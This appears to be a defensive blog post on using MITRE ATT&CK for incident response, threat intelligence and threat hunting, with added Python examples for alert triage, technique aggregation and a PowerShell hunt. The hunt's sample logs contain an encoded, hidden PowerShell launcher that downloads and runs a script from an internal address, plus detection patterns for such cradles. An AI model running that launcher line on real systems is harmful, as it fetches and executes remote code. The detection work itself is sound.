
Beyond the Matrix: The Multifaceted Applications of MITRE ATT&CK for Blue Teams - Part II

In the previous blog post, we introduced the MITRE ATT&CK framework and its components, and we discussed how it can be leveraged to detect threats. Building on that, this second part explores the other uses of the framework for blue teams: improving incident response, cyber threat intelligence and threat hunting. Let's jump in!

1. Improve Incident Response

Once the detection rules have been implemented and enabled in production, a suspicious behavior is captured, an alert is triggered, and the incident response step takes center stage.

Here again, the MITRE framework can be used by analysts. Having the detections mapped to the ATT&CK matrix indicates which technique or sub-technique a triggered alert corresponds to. This is of great help to the analysts investigating the alert, since they can look up the technique and read its details to better understand the behavior that was captured.

Also, since alerts tend to carry a large set of fields, the mapping helps identify which ones matter when determining whether the alert is a real incident or a false positive.

Additionally, referencing the technique lets incident responders place the alert within the broader sequence of adversary tactics. This gives them an indication of how far the attacker has progressed into the network and allows a first assessment of the scope and impact of the attack, so that they can prioritize their efforts and prevent further damage.
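The following added example (not code from the original post) shows what that mapping looks like in practice: alerts that arrive tagged with an ATT&CK technique ID are enriched with the technique name, its tactic and a short list of fields to check first, then grouped per host and ranked by the furthest tactic reached, so the host where the adversary has progressed deepest is triaged first. The technique IDs and tactic order are real Enterprise ATT&CK values; the "fields to check first" column and the alert feed are constructed for illustration and are not something ATT&CK publishes.

```python
"""Triage ATT&CK-mapped alerts by how far an adversary has progressed.

Added example (not code from the original post). It assumes a SIEM that
emits alerts already tagged with an ATT&CK technique ID and uses a
hand-written subset of Enterprise ATT&CK techniques as its lookup table.
"""
from collections import defaultdict

# Enterprise ATT&CK tactics in matrix (left-to-right) order.
TACTIC_ORDER = [
    "reconnaissance", "resource-development", "initial-access", "execution",
    "persistence", "privilege-escalation", "defense-evasion",
    "credential-access", "discovery", "lateral-movement", "collection",
    "command-and-control", "exfiltration", "impact",
]
TACTIC_RANK = {t: i for i, t in enumerate(TACTIC_ORDER)}

# Subset of real technique IDs. The "fields" entry is the analyst's own
# triage guidance (an assumption here), not something ATT&CK publishes.
TECHNIQUES = {
    "T1566.001": ("Spearphishing Attachment", "initial-access",
                  ["sender", "attachment_hash"]),
    "T1059.001": ("PowerShell", "execution",
                  ["process.command_line", "process.parent.name"]),
    "T1547.001": ("Registry Run Keys / Startup Folder", "persistence",
                  ["registry.path", "registry.value"]),
    "T1003.001": ("LSASS Memory", "credential-access",
                  ["process.name", "target.process.name"]),
    "T1021.002": ("SMB/Windows Admin Shares", "lateral-movement",
                  ["source.ip", "destination.ip", "user.name"]),
    "T1048":     ("Exfiltration Over Alternative Protocol", "exfiltration",
                  ["destination.ip", "network.bytes_out"]),
}


def enrich(alert):
    """Attach technique name, tactic, tactic rank and the fields to check first."""
    name, tactic, fields = TECHNIQUES[alert["technique_id"]]
    return {**alert, "technique": name, "tactic": tactic,
            "tactic_rank": TACTIC_RANK[tactic], "check_first": fields}


def triage(alerts):
    """Group alerts per host and rank hosts by the furthest tactic reached.

    Returns a list of (host, furthest_tactic, [technique_ids]) with the
    host where the adversary progressed deepest first; technique IDs for
    each host are ordered by tactic so the chain of events reads in order.
    """
    per_host = defaultdict(list)
    for alert in alerts:
        per_host[alert["host"]].append(enrich(alert))
    incidents = []
    for host, items in per_host.items():
        items.sort(key=lambda item: item["tactic_rank"])
        deepest = items[-1]
        incidents.append((host, deepest["tactic"],
                          [item["technique_id"] for item in items]))
    incidents.sort(key=lambda inc: TACTIC_RANK[inc[1]], reverse=True)
    return incidents


# Constructed alerts standing in for a SIEM feed.
SAMPLE_ALERTS = [
    {"host": "ws-17", "technique_id": "T1566.001"},
    {"host": "ws-17", "technique_id": "T1059.001"},
    {"host": "srv-db2", "technique_id": "T1021.002"},
    {"host": "srv-db2", "technique_id": "T1048"},
    {"host": "ws-42", "technique_id": "T1547.001"},
    {"host": "srv-db2", "technique_id": "T1003.001"},
]

if __name__ == "__main__":
    for host, tactic, techs in triage(SAMPLE_ALERTS):
        print(f"{host:8} deepest tactic: {tactic:18} {techs}")
```

Ranking by the deepest tactic is deliberately a first-pass heuristic: an exfiltration alert on a database server outranks a phishing-plus-PowerShell pair on a workstation, which matches the scope-and-impact assessment described above, but the analyst still verifies each alert using the listed fields before declaring an incident.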

1.1 MITRE ATT&CK based Incident Response Playbooks

One of the important components of incident handling is the set of Incident Response Playbooks, which provide the specific actions an organization should take to prepare for, respond to, and recover from incidents.

Usually, organizations define one playbook per incident type, such as Malware, Phishing, Denial of Service, Insider Threat or Data Breach.

However, some organizations prefer MITRE-based incident response playbooks that are aligned with the ATT&CK framework: each playbook is designed to respond to a specific attack technique, aiming for a more targeted approach and thereby improving the precision and effectiveness of the response. An example of this kind of playbook can be found here.

Lastly, when choosing between the two approaches (general or MITRE-based playbooks), take into account the effort of building MITRE-based playbooks, given the number of available techniques and the fact that the right response to each one depends on how adversaries actually use it.

2. Enhance Cyber Threat Intelligence

Cyber threat intelligence revolves around being aware of adversaries' activities and using this knowledge to improve decision-making.

Sharing this information gives organizations early warning of emerging threats and vulnerabilities and lets them learn from the experience of others, so that potential risks can be detected and mitigated proactively before they become widespread.

2.1 Providing common language

For the exchange of information described above to be efficient, a common language is needed. This is where MITRE ATT&CK comes into the picture: it provides a common language and taxonomy for describing adversary behavior across the attack lifecycle, allowing security professionals to communicate effectively about threats, understand attacker methodologies, and prioritize defensive strategies.

2.2 Starting in cyber threat intelligence

Because ATT&CK helps us understand adversary behavior, it can play a pivotal role in an organization's cyber threat intelligence journey, regardless of its maturity level.

According to the MITRE team, to start using ATT&CK for threat intelligence you can simply go to the ATT&CK website (attack.mitre.org), enter your industry in the search bar, and get the threat groups known to target it. Taking the Energy sector as an example, OilRig, LAPSUS$ and menuPass are some of the groups listed as targeting this industry, as shown in the image below. Note that this is a full-text search over the knowledge base, so check each group's description to confirm the targeting rather than relying on the search hit alone.

Figure.1: Threat Groups Targeting the Energy sector -MITRE ATT&CK-


Next, you can check the techniques used by these groups, learn about them, and share that knowledge with the teams responsible for creating detections and deploying mitigations.

2.3 Leveling Up

If you already have the threat intelligence foundation discussed above, stepping up to the next level requires you to map intelligence to ATT&CK yourself rather than relying on mappings done by others.

For this purpose, internal data such as your organization's incident reports can be used, as well as external sources such as blog posts, OSINT reports and threat intelligence subscriptions.

The MITRE ATT&CK team suggests the following steps for mapping a threat intelligence source to ATT&CK:

  1. Understand the ATT&CK structure and components (tactics, techniques, data sources, threat groups, etc.).
  2. When looking at a specific behavior, take a step back and consider the adversary's strategy as a whole rather than fixating on isolated indicators.
  3. Research the observed behavior further.
  4. Considering the goal of that behavior, translate it into a tactic (the original MITRE guidance lists 12; Enterprise ATT&CK has had 14 since Reconnaissance and Resource Development were added).
  5. Next, explore the techniques under the selected tactic and try to determine which one the behavior corresponds to.
  6. Finally, compare your results with those of other analysts and discuss the differences.

The results should then be aggregated to determine which techniques are commonly used by multiple threat groups relevant to your organization. This is of great value for deciding what to prioritize.
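As an added example (not code from the original post or from MITRE), the aggregation step above can be done with a few lines of Python: count how many of the groups relevant to you use each technique, rank the techniques by that count, and emit the result as an ATT&CK Navigator layer so the overlap can be visualized on the matrix. The group-to-technique mapping below is constructed for illustration and is not ATT&CK's actual profile of any group; the Navigator layer field names follow the layer JSON format, but the version numbers in the `versions` object are assumptions to adjust for your Navigator instance.

```python
"""Aggregate ATT&CK technique usage across the threat groups relevant to you.

Added example, not from the original post. The group-to-technique mapping
below is constructed for illustration; replace it with the techniques you
mapped from your own incident reports and external reporting.
"""
import json
from collections import Counter

# Constructed mapping: threat group -> technique IDs observed in reporting.
# Group names are placeholders, not real ATT&CK group entries.
GROUP_TECHNIQUES = {
    "Group-A": {"T1566.001", "T1059.001", "T1547.001", "T1003.001"},
    "Group-B": {"T1566.001", "T1059.001", "T1021.002", "T1048"},
    "Group-C": {"T1059.001", "T1003.001", "T1021.002", "T1486"},
}


def rank_techniques(group_techniques):
    """Return [(technique_id, number_of_groups_using_it)], most common first.

    Ties are broken by technique ID so the output is deterministic.
    """
    counts = Counter()
    for techniques in group_techniques.values():
        counts.update(techniques)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def navigator_layer(ranked, name="Relevant groups: technique overlap"):
    """Build an ATT&CK Navigator layer dict scoring each technique by group count.

    Field names follow the Navigator layer JSON format; the version numbers
    are assumptions and may need adjusting for your Navigator deployment.
    """
    max_score = max(n for _, n in ranked) if ranked else 0
    return {
        "name": name,
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Techniques scored by how many relevant groups use them",
        "techniques": [
            {"techniqueID": tid, "score": n,
             "comment": f"used by {n} relevant group(s)"}
            for tid, n in ranked
        ],
        "gradient": {"colors": ["#ffffff", "#ff6666"],
                     "minValue": 0, "maxValue": max_score},
    }


if __name__ == "__main__":
    ranked = rank_techniques(GROUP_TECHNIQUES)
    for tid, n in ranked:
        print(f"{tid:10} {n}")
    print(json.dumps(navigator_layer(ranked), indent=2))
```

With this data the top of the list is PowerShell (T1059.001), used by all three groups, followed by LSASS credential dumping, SMB lateral movement and spearphishing attachments; those are the techniques whose detections and mitigations would be worth verifying first. Writing the JSON to a file and loading it into the Navigator gives the same picture as a heatmap.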

3. Using ATT&CK for Threat Hunting

Threat hunting is the discipline that goes beyond passive defense mechanisms. It is a proactive approach that involves actively searching for signs of malicious activity within an organization's systems and networks.

Its starting point is developing the hypothesis, that is, the malicious activity we assume is happening. The more clearly the latter is defined, the more effective the hunt will be.

One of the resources that can be used here is... yes, you guessed it: the MITRE ATT&CK framework.

Following the hypothesis-driven process model, the hunting team outlines a potential attack scenario, then determines what evidence attackers might leave behind.

For this purpose, the TTPs documented in ATT&CK are a treasure trove for building the initial hypothesis, using questions such as: which techniques are likely to be used against us? What procedures implement that technique? What traces would be expected in the logs?

It also allows hunters to scope their hunts to specific categories of behavior based on their environment and, for better efficiency, on the adversary profiles and high-impact tactics that pose significant risk according to the threat intelligence results.

For example, if FIN10 is one of the threat groups targeting your organization or industry, you can check the techniques that MITRE ATT&CK lists for this group. You will find that they include the use of PowerShell for Execution as well as PowerShell Empire to establish Persistence. As a threat hunter, you can use this knowledge to build hypotheses about malicious PowerShell and PowerShell Empire commands running on your systems, and from there begin the hunt.
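To make the FIN10 example concrete, here is an added example (not code from the original post or from MITRE) of turning that hypothesis into a hunt over process-creation logs. The hypothesis encoded is "an Empire-style launcher runs PowerShell hidden, without a profile, with a base64-encoded command that contains a download cradle"; each command line is scored against those three indicators and only lines meeting a threshold are returned, so a lone hidden-window PowerShell run by an admin is not flagged. The log lines are constructed, the `host|user|command_line` record format is an assumption, and the indicator patterns are illustrative rather than a signature for every Empire variant.

```python
"""Hunt for Empire-style PowerShell launchers in process-creation logs.

Added example, not from the original post or from MITRE. The log lines are
constructed; the patterns encode the hunt hypothesis "Empire launchers run
hidden, non-profile, base64-encoded PowerShell with a download cradle",
not a signature for every Empire variant.
"""
import base64
import re

# Indicator 1: hidden window plus no profile, typical of a launcher one-liner.
LAUNCHER_FLAGS = re.compile(
    r"-(?:nop|noprofile)\b.*-(?:w|windowstyle)\s+(?:1|hidden)\b", re.I)
# Indicator 2: an -EncodedCommand payload (base64 of a UTF-16LE script).
ENCODED_CMD = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Indicator 3: download-and-execute cradle tokens, checked in the decoded script.
CRADLE_TOKENS = ("Net.WebClient", "DownloadString", "IEX", "Invoke-Expression")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (UTF-16LE), or None."""
    match = ENCODED_CMD.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmdline):
    """Return (score, reasons) for one PowerShell command line."""
    reasons = []
    if LAUNCHER_FLAGS.search(cmdline):
        reasons.append("hidden window + no profile")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
    # Look for the cradle in the decoded script when there is one.
    haystack = (decoded if decoded is not None else cmdline).lower()
    for token in CRADLE_TOKENS:
        if token.lower() in haystack:
            reasons.append(f"download cradle token: {token}")
            break
    return len(reasons), reasons


def hunt(log_lines, threshold=2):
    """Parse 'host|user|command_line' records and return suspicious PowerShell runs."""
    hits = []
    for line in log_lines:
        host, user, cmdline = line.split("|", 2)
        if "powershell" not in cmdline.lower():
            continue
        score, reasons = score_command(cmdline)
        if score >= threshold:
            hits.append({"host": host, "user": user,
                         "score": score, "reasons": reasons})
    return hits


def _encode_ps(script):
    """Encode a script the way 'powershell -enc' expects (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample log lines in the assumed host|user|command_line format.
SAMPLE_LOGS = [
    "ws-17|jdoe|powershell.exe -NoP -sta -w 1 -enc "
    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"),
    "ws-42|admin|powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "srv-db2|svc|powershell.exe -nop -w hidden -c \"Get-Service\"",
    "ws-08|bob|notepad.exe C:\\notes.txt",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOGS):
        print(hit)
```

Decoding the encoded command before matching is the important design choice: the cradle never appears in the raw command line of a launcher, so a hunt that only greps the command line would miss the first record entirely. The threshold is what keeps the hunt from drowning in the benign hidden-window scripts that administrators schedule every day; lower it if the environment has none.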

Conclusion

As we explored in the two parts of this blog post, the MITRE ATT&CK framework is a versatile and indispensable tool in today's cybersecurity landscape, with applications across threat detection, incident response, threat intelligence and threat hunting, empowering defenders to stay ahead of adversaries in an ever-changing field.